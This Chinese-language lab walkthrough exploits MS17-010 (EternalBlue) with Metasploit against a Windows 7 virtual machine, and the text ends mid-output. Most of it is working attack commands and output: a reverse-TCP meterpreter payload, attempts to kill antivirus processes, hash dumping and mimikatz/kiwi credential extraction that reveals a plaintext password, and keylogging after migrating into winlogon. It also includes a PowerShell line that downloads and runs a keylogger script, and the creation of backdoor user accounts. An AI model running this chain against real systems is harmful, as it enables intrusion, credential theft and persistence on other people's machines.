永恒之蓝ms17-010的利用
实验环境:
Kali虚拟机:攻击机
Win7虚拟机:目标机
主要工具:metasploit
##获取meterpreter
- 使用关键字
17-010在metasploit中查找
msf5 > search 17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
2 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
- 使用辅助模块auxiliary中的
auxiliary/scanner/smb/smb_ms17_010验证是否存在漏洞
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.8.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
可以看到"Host is likely VULNERABLE to MS17-010!…",说明漏洞存在。
-
利用漏洞反弹shell,获取meterpreter
360安全卫士会拦截,目标机器不能装360或需关闭360。
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.124
lhosts => 192.168.8.124
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.8.124:4444
[*] 192.168.8.129:445 - Connecting to target for exploitation.
[+] 192.168.8.129:445 - Connection established for exploitation.
[+] 192.168.8.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.8.129:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.8.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.8.129:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.8.129:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.8.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.8.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.8.129:445 - Sending all but last fragment of exploit packet
[*] Sending stage (206403 bytes) to 192.168.8.129
[*] Meterpreter session 1 opened (192.168.8.124:4444 -> 192.168.8.129:49475) at 2019-10-12 03:50:01 -0400
[-] 192.168.8.129:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError
meterpreter >
##确认用户权限
meterpreter > shell
Process 2132 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>exit
exit
meterpreter >
可以看到是system权限。
也可以直接在meterpreter中运行getuid查看用户权限:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
##提权
如果不是system权限,可以尝试提权:
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
看到"got system via technique…"字样,提权成功。
##关闭杀毒软件
- 自定义字典
在/usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt中自定义字典,添加需要关闭的杀毒软件进程,如zhudongfangyu.exe、360tray.exe,全部小写。
- 关闭杀毒软件
- killav
不要使用run killav
meterpreter > run post/windows/manage/killav
[*] Attempting to terminate 'ZhuDongFangYu.exe' (PID: 1064) ...
[-] Failed to terminate 'ZhuDongFangYu.exe' (PID: 1064).
[*] Attempting to terminate '360Tray.exe' (PID: 3408) ...
[-] Failed to terminate '360Tray.exe' (PID: 3408).
[+] A total of 2 process(es) were discovered, 0 were terminated.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
明明是system权限,进程竟然没有被杀掉,郁闷。
- powershell
通过shell命令进入到目标机器,然后执行powershell命令开启powershell交互界面,这个时候输入命令无响应,无法通过这种方式在目标机器执行powershell命令。所以采用下面这种方法。
meterpreter > load
load espia load kiwi load peinjector load sniffer
load extapi load lanattacks load powershell load unhook
load incognito load mimikatz load python load winpmem
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > help powershell
Powershell Commands
===================
Command Description
------- -----------
powershell_execute Execute a Powershell command string
powershell_import Import a PS1 script or .NET Assembly DLL
powershell_shell Create an interactive Powershell prompt
meterpreter > powershell_shell
PS > Get-Process
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
173 20 13964 9544 117 0.23 1732 360leakfixer
584 55 99776 105588 317 8.49 3944 360Safe
1936 152 164724 20452 577 12.62 3408 360Tray
32 5 1088 3100 49 0.02 696 conhost
31 5 1084 3108 49 0.05 1448 conhost
515 12 2100 4360 83 0.50 364 csrss
574 15 10624 10204 178 2.64 468 csrss
195 16 4328 6932 57 0.56 1936 dllhost
126 14 51340 38100 130 1.05 2592 dwm
706 49 28940 46708 247 7.92 2632 explorer
64 7 1040 2832 35 0.03 1496 Ext2Srv
0 0 0 24 0 0 Idle
40 5 940 2392 21 0.00 1552 imdsksvc
772 24 4304 8300 45 2.09 572 lsass
204 10 2768 5024 33 0.11 580 lsm
50 8 996 2952 47 0.03 1584 metsvc
148 17 3476 4484 61 0.06 2192 msdtc
257 22 51456 55128 558 0.30 1608 powershell
271 22 51200 55432 559 0.22 3936 powershell
778 55 34844 16556 147 1.06 2076 SearchIndexer
228 14 5372 6572 44 2.15 556 services
405 31 9896 14852 163 0.94 3712 sesvc
30 2 452 776 4 0.12 276 smss
306 31 10076 13592 137 0.98 1856 SoftMgrLite
648 54 84828 76780 639 0.90 1284 spoolsv
508 17 5880 7316 44 1.26 548 svchost
361 14 4364 7272 46 2.40 688 svchost
268 16 3840 6712 38 0.34 792 svchost
472 23 17756 14100 84 3.07 860 svchost
427 24 66132 68028 162 13.32 940 svchost
1183 52 20824 24108 408 6.65 984 svchost
571 35 14256 12320 92 1.93 1144 svchost
143 15 2612 13328 51 0.34 1292 svchost
257 30 5788 7968 49 0.53 1332 svchost
94 8 1648 3592 47 0.02 1916 svchost
103 13 1872 5000 34 0.14 1992 svchost
314 41 61952 5296 129 0.73 2916 svchost
646 0 112 368 3 4 System
205 16 7412 8980 83 0.27 2504 taskhost
127 12 3640 13272 112 7.52 3440 taskmgr
280 23 11824 912 128 1.67 1016 updater
87 10 5224 3744 62 0.08 1632 VGAuthService
56 6 1436 2748 39 0.00 748 vmacthlp
310 25 10320 11500 100 5.88 1688 vmtoolsd
244 22 10488 15192 125 6.63 2788 vmtoolsd
82 10 1560 3988 57 0.09 456 wininit
118 10 2964 5708 66 0.25 520 winlogon
230 15 7052 10468 52 1208 WmiPrvSE
382 35 10520 10848 105 1.05 1064 ZhuDongFangYu
PS > Stop-Process 1064
ERROR: Stop-Process : ??????????????ZhuDongFangYu (1064)?: ?????
ERROR: ???? ?:1 ??: 13
ERROR: + Stop-Process <<<< 1064
ERROR: + CategoryInfo : CloseError: (System.Diagnost...(ZhuDongFangYu):Process) [Stop-Process], ProcessCommandEx
EERROR: + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand
ERROR:
PS >
现在meterpreter中加载powershell模块,然后执行powershell_shell命令进入交互式powershell界面。通过Get-Process查看到ZhuDongFangYu进程id为1064,然后通过Stop-Process停止进程,还是没有杀掉,持续郁闷。
关闭防火墙
略
##信息收集
###获取目标主机详细信息
- run scraper
获取系统信息、环境变量、网络、服务、用户、域、密码哈希等信息。
meterpreter > run scraper
[*] New session on 192.168.8.129:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\oksMbdKb.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\xZUHpvAU.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\pcrWzade.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\AXZDmEKp.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\jaOsLEOM.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.8.129:445...
meterpreter >
- run winenum
部分结果和run scraper重复。
meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 192.168.1.8:445...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/PC_20191012.5354/PC_20191012.5354.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/PC_20191012.5354
[*] Checking if PC is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Disabled
[*] Running Command List ...
[*] running command arp -a
[*] running command ipconfig /displaydns
[*] running command ipconfig /all
[*] running command route print
[*] running command cmd.exe /c set
[*] running command netstat -ns
[*] running command netstat -nao
[*] running command net accounts
[*] running command netstat -vb
[*] running command net view
[*] running command net localgroup
[*] running command net group administrators
[*] running command net session
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command net localgroup administrators
[*] running command tasklist /svc
[*] running command netsh wlan show drivers
[*] running command gpresult /SCOPE USER /Z
[*] running command netsh wlan show networks mode=bssid
[*] running command gpresult /SCOPE COMPUTER /Z
[*] running command netsh wlan show profiles
[*] running command netsh wlan show interfaces
[*] Running WMIC Commands ....
[*] running command wmic group list
[*] running command wmic service list brief
[*] running command wmic netlogin get name,lastlogon,badpasswordcount
[*] running command wmic logicaldisk get description,filesystem,name,size
[*] running command wmic useraccount list
[*] running command wmic netuse get name,username,connectiontype,localname
[*] running command wmic nteventlog get path,filename,writeable
[*] running command wmic volume list brief
[*] running command wmic share get name,path
[*] running command wmic netclient list brief
[*] running command wmic qfe
[*] running command wmic startup list full
[*] running command wmic rdtoggle list
[*] running command wmic product get name,version
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
meterpreter >
###查看目标主机安装了哪些应用
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on PC
Installed Applications
======================
Name Version
---- -------
Advanced Archive Password Recovery 4.54.110.4540
Elcomsoft Forensic Disk Decryptor 1.00.110.1392
Ext2Fsd 0.69 0.69
Java 8 Update 121 (64-bit) 8.0.1210.13
Java Auto Updater 2.8.181.13
Java SE Development Kit 8 Update 121 (64-bit) 8.0.1210.13
Microsoft .NET Framework 4.7.2 4.7.03062
Microsoft .NET Framework 4.7.2 4.7.03062
Microsoft .NET Framework 4.7.2 (CHS) 4.7.03062
Microsoft .NET Framework 4.7.2 (简体中文) 4.7.03062
Microsoft Visual C++ 2005 Redistributable 8.0.61187
Microsoft Visual C++ 2005 Redistributable (x64) 8.0.61186
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523 9.0.30729.7523
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61135 11.0.61135
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61135 11.0.61135
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61135 11.0.61135
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61135 11.0.61135
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 12.0.40664.0
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 12.0.40664.0
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 12.0.40664
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 12.0.40664
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 12.0.40664
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 12.0.40664
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 14.15.26706.0
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 14.15.26706.0
Microsoft Visual C++ 2017 x64 Additional Runtime - 14.15.26706 14.15.26706
Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.15.26706 14.15.26706
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 14.15.26706
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 14.15.26706
Python 2.7.13 (64-bit) 2.7.13150
Python 3.7.3 Add to Path (64-bit) 3.7.3150.0
Python 3.7.3 Core Interpreter (64-bit) 3.7.3150.0
Python 3.7.3 Development Libraries (64-bit) 3.7.3150.0
Python 3.7.3 Documentation (64-bit) 3.7.3150.0
Python 3.7.3 Executables (64-bit) 3.7.3150.0
Python 3.7.3 Standard Library (64-bit) 3.7.3150.0
Python 3.7.3 Tcl/Tk Support (64-bit) 3.7.3150.0
Python 3.7.3 Test Suite (64-bit) 3.7.3150.0
Python 3.7.3 Utility Scripts (64-bit) 3.7.3150.0
Python 3.7.3 pip Bootstrap (64-bit) 3.7.3150.0
Python Launcher 3.7.6657.0
SecureCRT V6.2.3.313 汉化版 V6.2.3.313 汉化版
SilentEye 0.4.1
Stellar Phoenix JPEG Repair 5.0.0.0
Stellar Phoenix Photo Recovery Professional 8.0.0.1
Update for Microsoft .NET Framework 4.7.2 (KB4087364) 1
Update for Microsoft .NET Framework 4.7.2 (KB4457035) 1
VMware Tools 10.0.0.2977863
WinRAR 5.11 (64-位) 5.11.0
Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86 10.1.15254.1
Windows SDK AddOn 10.1.0.0
搜狗输入法 9.1正式版 9.1.0.2657
[+] Results stored in: /root/.msf4/loot/20191012053311_default_192.168.8.129_host.application_804807.txt
meterpreter >
###查看目标主机有哪些用户
meterpreter > run post/windows/gather/enum_logged_on_users
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-18 NT AUTHORITY\SYSTEM
S-1-5-21-1244648496-323992457-611466280-1000 PC\XinSai
[+] Results saved in: /root/.msf4/loot/20191012053946_default_192.168.8.129_host.users.activ_091950.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-1244648496-323992457-611466280-1000 C:\Users\XinSai
S-1-5-21-1244648496-323992457-611466280-501 C:\Users\Guest
meterpreter >
###抓取用户密码哈希
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XinSai:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
meterpreter >
格式为用户名:SID:LM哈希:NTLM哈希:::,之后可以使用类似John the Ripper等工具进行破解哈希。
###抓取用户密码明文
meterpreter内置了一些扩展库,可以通过输入load,然后连续按两次TAB键进行查看:
meterpreter > load
load espia load kiwi load peinjector load sniffer
load extapi load lanattacks load powershell load unhook
load incognito load mimikatz load python load winpmem
meterpreter > load
- kiwi模块
加载kiwi模块,然后运行creds_all命令。
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.1.1 20180925 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
XinSai PC f0d412bd764ffe81aad3b435b51404ee 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
PC$ WORKGROUP (null)
XinSai PC admin
tspkg credentials
=================
Username Domain Password
-------- ------ --------
XinSai PC admin
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
XinSai PC admin
pc$ WORKGROUP (null)
meterpreter >
可以看到用户XinSai的密码为"admin"。
- mimikatz模块
加载mimikatz模块,然后运行wdigest:
meterpreter > help mimikatz
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds.
livessp Attempt to retrieve livessp creds.
mimikatz_command Run a custom command.
msv Attempt to retrieve msv creds (hashes).
ssp Attempt to retrieve ssp creds.
tspkg Attempt to retrieve tspkg creds.
wdigest Attempt to retrieve wdigest creds.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;816638 NTLM PC xman666 mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;372325 NTLM PC XinSai mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;996 Negotiate WORKGROUP PC$ mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;48926 NTLM mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;999 NTLM WORKGROUP PC$ mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
meterpreter >
然而并没有得到密码,翻车。
###流量嗅探
####键盘记录
- keyscan_dump
Meterpreter还可以在目标设备上实现键盘记录功能,键盘记录主要涉及以下三种命令:
keyscan_start:开启键盘记录功能
keyscan_dump:显示捕捉到的键盘记录信息
keyscan_stop:停止键盘记录功能
不过在使用键盘记录功能时,通常需要跟目标进程进行绑定。下面我们会将Meterpreter跟 winlogon.exe 绑定,并在登录进程中捕获键盘记录,以获得用户的密码。
- 绑定进程
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
240 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
328 320 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
340 908 dwm.exe x64 3 C:\Windows\system32\Dwm.exe
384 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
412 320 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
524 412 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
540 412 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
548 412 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
616 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
648 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM
712 524 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
744 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
816 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
908 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM
960 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1032 1176 QwdqufeOMpX.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\QwdqufeOMpX.exe
1088 4060 LogonUI.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
1112 1176 sQoycPhez.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\sQoycPhez.exe
1176 524 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1212 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1268 524 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1320 524 Ext2Srv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ext2Fsd\Ext2Srv.exe
1364 524 imdsksvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\imdsksvc.exe
1412 524 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1456 524 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1584 524 taskhost.exe x64 3 C:\Windows\system32\taskhost.exe
1732 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1796 524 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1956 524 dllhost.exe x64 0 NT AUTHORITY\SYSTEM
1996 648 WmiPrvSE.exe
2284 1088 csrss.exe x64 3 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
2408 2732 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe
2496 2272 explorer.exe x64 3 C:\Windows\Explorer.EXE
2596 524 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2668 524 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2732 524 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
2828 1176 xmutGkHXf.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\xmutGkHXf.exe
2840 1176 TeyQCXoY.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\TeyQCXoY.exe
3020 1176 plKeHIXhzUQQ.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\plKeHIXhzUQQ.exe
3220 1176 maBudFEovnC.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\maBudFEovnC.exe
3384 1176 wLBliAR.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\wLBliAR.exe
3456 2912 csrss.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
3748 816 audiodg.exe x64 0
3784 2732 SearchProtocolHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchProtocolHost.exe
3944 2496 vmtoolsd.exe x64 3 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
4024 1176 dtUmbNlfMa.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\TEMP\dtUmbNlfMa.exe
4060 2912 winlogon.exe x64 4 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
meterpreter > getpid
Current pid: 1176
meterpreter >
可以看到winlogon.exe的pid为4060,且当前meterpreter的pid为1176。下面进行进程绑定。
meterpreter > migrate 4060
[*] Migrating from 1176 to 4060...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 4060
meterpreter >
绑定成功,且meterpreter的pid已迁移到目标进程。
- 键盘监听
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter >
此时在受害者机密登录界面,输入密码进行登录。然后:
meterpreter > keyscan_dump
Dumping captured keystrokes...
admin<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >
成功捕获了受害者的输入"admin“,密码即"admin”,最后是回车。
- keylogrecorder
meterpreter > run keylogrecorder -h
[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
Keylogger Recorder Meterpreter Script
This script will start the Meterpreter Keylogger and save all keys
in a log file for later anlysis. To stop capture hit Ctrl-C
Usage:
OPTIONS:
-c <opt> Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2.
-h Help menu.
-k Kill old Process
-l Lock screen when capturing Winlogon credentials.
-t <opt> Time interval in seconds between recollection of keystrokes, default 30 seconds.
meterpreter > run keylogrecorder -c 0
[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
[*] explorer.exe Process found, migrating into 2764
[*] Migration Successful!!
[*] explorer.exe Process found, migrating into 928
meterpreter > run keylogrecorder -c 0
[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
meterpreter >
结果并没有捕获到键盘输入,翻车。
- Get-Keystrokes
下载powershell脚本:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1,上传到目标主机,然后执行:
PS D:\> Import-Module .\Get-Keystrokes.ps1
PS D:\> Get-Keystrokes -LogPath c:\windows\temp\key.log
PS D:\>
所有的按键都会被记录到key.log中。
也可以执行如下命令:
PS D:\> iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1’); Get-Keystrokes –Logpath c:\windows\temp\key.log
##添加新用户
- run getgui
meterpreter > run getgui -u xman666 -p admin
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: xman666 with Password: admin
[-] Account could not be created
[-] Error:
[-] 命令成功完成。
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.2058.rc
meterpreter > shell
Process 4020 created.
Channel 54 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>net user xman666
net user xman666
用户名 xman666
全名
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2019/10/13 11:20:58
密码到期 2019/11/24 11:20:58
密码可更改 2019/10/13 11:20:58
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
C:\Windows\system32>
可以看到,这里用户创建成功了,但添加到Administrators组失败了。
- 命令行
meterpreter > shell
Process 2816 created.
Channel 52 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>net user
net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest XinSai
xman666
命令运行完毕,但发生一个或多个错误。
C:\Windows\system32>net user test test /add
net user test test /add
命令成功完成。
C:\Windows\system32>net user
net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest test
XinSai xman666
命令运行完毕,但发生一个或多个错误。
可以看到添加了一个用户test,密码为test。查看用户信息:
C:\Windows\system32>net user test
net user test
用户名 test
全名
注释
用户的注释
